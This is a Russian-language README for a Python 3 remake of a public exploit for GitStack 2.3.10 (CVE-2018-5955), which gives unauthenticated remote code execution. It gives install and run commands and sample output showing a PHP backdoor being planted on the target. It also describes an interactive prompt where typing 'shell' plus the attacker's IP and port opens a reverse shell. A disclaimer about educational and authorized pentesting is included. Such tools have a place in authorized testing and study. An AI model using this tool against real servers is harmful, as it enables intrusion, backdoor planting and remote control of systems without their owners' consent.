
Эксплойт для CVE-2018-5955 GitStack 2.3.10 — неаутентифицированное удалённое выполнение кода (RCE).
Эксплойт для CVE-2018-5955 GitStack 2.3.10: неаутентифицированное удалённое выполнение кода (RCE)
Exploit: GitStack 2.3.10 - неаутентифицированное удалённое выполнение кода
Date: 18.01.2018
Software Link: https://gitstack.com/
Exploit Author: Kacper Szurek
Original Exploit: https://www.exploit-db.com/exploits/43777
Website: https://security.szurek.pl/
Category: удалённый
CVE: CVE-2018-5955
Date: 23.06.2023
New features: Интерактивное RCE, определение ОС, функция реверс-шелла, адаптировано с python2 на python3
CVE: CVE-2018-5955
Category: удалённый
Я не несу ответственности за ваши действия, так как разместил это на GitHub в образовательных целях или для сертифицированного и авторизованного тестирования на проникновение
Установите зависимости:
pip install colorama
Затем запустите командой:
python3 exploit.py
ОС будет определена после эксплуатации CVE; в выводе появится строка: "[*] OS: $operatingsystem" (демонстрация ниже)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Вы также можете ввести «os», чтобы узнать тип операционной системы
Чтобы получить работающий реверс-шелл на цели, введите «shell», затем ваш IP и порт для прослушивания, как показано ниже:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE